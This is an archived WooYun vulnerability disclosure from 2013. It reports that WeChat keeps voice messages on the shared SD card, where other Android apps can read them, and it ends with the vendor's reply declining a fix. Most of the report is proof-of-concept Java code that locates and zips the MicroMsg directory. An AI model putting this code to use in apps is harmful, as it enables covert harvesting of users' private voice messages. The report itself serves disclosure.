乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-11-08: 细节已通知厂商并且等待厂商处理中 2013-11-08: 厂商已经主动忽略漏洞,细节向公众公开
对于im,用户的文字交流与语音交流均属于用户的嫉妒隐私!尤其是女神们,估计不错的话他们语音要多于文字吧!任意恶意app可读取语音记录并发往远程服务器!root与非root均中
文件被存放在下面的路径里/storage/sdcard0/tecent/micromsg/xxx/xxx/voice2/xx/xx/xx.amr
利用代码
import java.io.File;import java.io.IOException;import android.os.Bundle;import android.app.Activity;import android.view.Menu;import android.widget.Toast;import com.xx.test4wechat.FileUtils;import com.xx.test4wechat.ZipUtils;public class MainActivity extends Activity { @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); FileUtils fileUtils = new FileUtils(); String sDir = "tencent/MicroMsg/"; String zDir = "xxx"; String zipName = "xxx.zip"; String SDRoot = fileUtils.getSDCardRoot(); String sourceDir = SDRoot + sDir; File sFile = new File(sourceDir); if(sFile.exists() & sFile.isDirectory()){ String dir = SDRoot + zDir; File zFile = new File(dir); if(!zFile.exists()){ File tempFile = fileUtils.createSDDir(dir); } if(!zFile.exists()) fileUtils.createSDDir(zDir); String zipDir = dir + File.separator + zipName; File zipDirFile = new File(zipDir); if(!zipDirFile.exists()){ try { fileUtils.createFileInSDCard(zDir, zipName); } catch (IOException e1) { // TODO Auto-generated catch block e1.printStackTrace(); } } try { ZipUtils.zipFiles(sourceDir, zipDir); Toast.makeText(getApplicationContext(), "success!!!", Toast.LENGTH_LONG).show(); } catch (IOException e) { // TODO Auto-generated catch block e.printStackTrace(); } }else{ Toast.makeText(getApplicationContext(), "failed!!!", Toast.LENGTH_LONG).show(); } } @Override public boolean onCreateOptionsMenu(Menu menu) { // Inflate the menu; this adds items to the action bar if it is present. getMenuInflater().inflate(R.menu.main, menu); return true; }}
private static final int BUFF_SIZE = 1024 * 1024; /** * 批量压缩文件 * @param resFileList 需要压缩的文件 * @param zipFile 生成的文件 * @throws IOException 压缩异常 */ public static void zipFiles(String sourceDir , String zipDir ) throws IOException{ File zipFile = new File(zipDir); File dirFile = new File(sourceDir); File[] resFileList = dirFile.listFiles(); ZipOutputStream zipOut = null; try{ zipOut = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(zipFile),BUFF_SIZE)); for(File resFile : resFileList){ zipFile(resFile , zipOut ,""); } } finally { zipOut.close(); } } /** * 批量压缩文件 * @param resFileList 需要压缩的文件 * @param zipFile 生成的文件 * @throws IOException 压缩异常 */ public static void zipFiles(String sourceDir , String zipDir , String comment ) throws IOException{ File zipFile = new File(zipDir); File dirFile = new File(sourceDir); File[] resFileList = dirFile.listFiles(); ZipOutputStream zipOut = null; try{ zipOut = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(zipFile),BUFF_SIZE)); for(File resFile : resFileList){ zipFile(resFile , zipOut ,""); } zipOut.setComment(comment); } finally { zipOut.close(); } } /** * 压缩文件 * @param resFile 需要压缩的文件或者文件夹 * @param zipOut 压缩文件的目的文件 * @param rootPath 压缩文件的路径 * @throws UnsupportedEncodingException 找不到文件的异常 * @throws IOException 压缩错误异常 */ private static void zipFile(File resFile, ZipOutputStream zipOut,String rootPath) throws UnsupportedEncodingException , IOException { // TODO Auto-generated method stub rootPath = rootPath + ((rootPath.trim().length() == 0)?"" : File.separator) + resFile.getName(); rootPath = new String(rootPath.getBytes("8859_1"),"GB2312"); BufferedInputStream input = null; try{ if(resFile.isDirectory()){ File[] fileList = resFile.listFiles(); for(File file : fileList){ zipFile(file , zipOut , rootPath); } }else{ byte buffer[] = new byte[BUFF_SIZE]; input = new BufferedInputStream(new FileInputStream(resFile) , BUFF_SIZE); zipOut.putNextEntry(new ZipEntry(rootPath)); int realLength; while((realLength = input.read(buffer)) != -1){ zipOut.write(buffer , 0 , realLength); } input.close(); zipOut.flush(); zipOut.closeEntry(); } } finally{ if (input != null) input.close(); } }
public File createFileInSDCard(String dir,String fileName) throws IOException{ File file = new File(SDCardRoot + dir + File.separator + fileName); file.createNewFile(); file.canWrite(); return file; } /** * 在SD卡上创建目录 * @param dir 目录路径 * @return */ public File createSDDir(String dir){ File dirFile = new File(SDCardRoot + dir + File.separator); if(!dirFile.exists()){ dirFile.mkdirs(); } dirFile.canWrite(); return dirFile; }
public String getSDState(){ return SDStateString; } public String getSDCardRoot(){ return SDCardRoot; }
....
危害等级:无影响厂商忽略
忽略时间:2013-11-08 20:14
非常感谢您的报告,andriod操作系统的设计使app都可以读取SD卡内容(只要用户同意读写权限),此问题我们认为风险较低,暂不修复。针对这种恶意app的情况,您可以通过安装QQ手机管家来增强对微信隐私的保护能力。我们会持续增强微信的安全保护能力,再次感谢。
暂无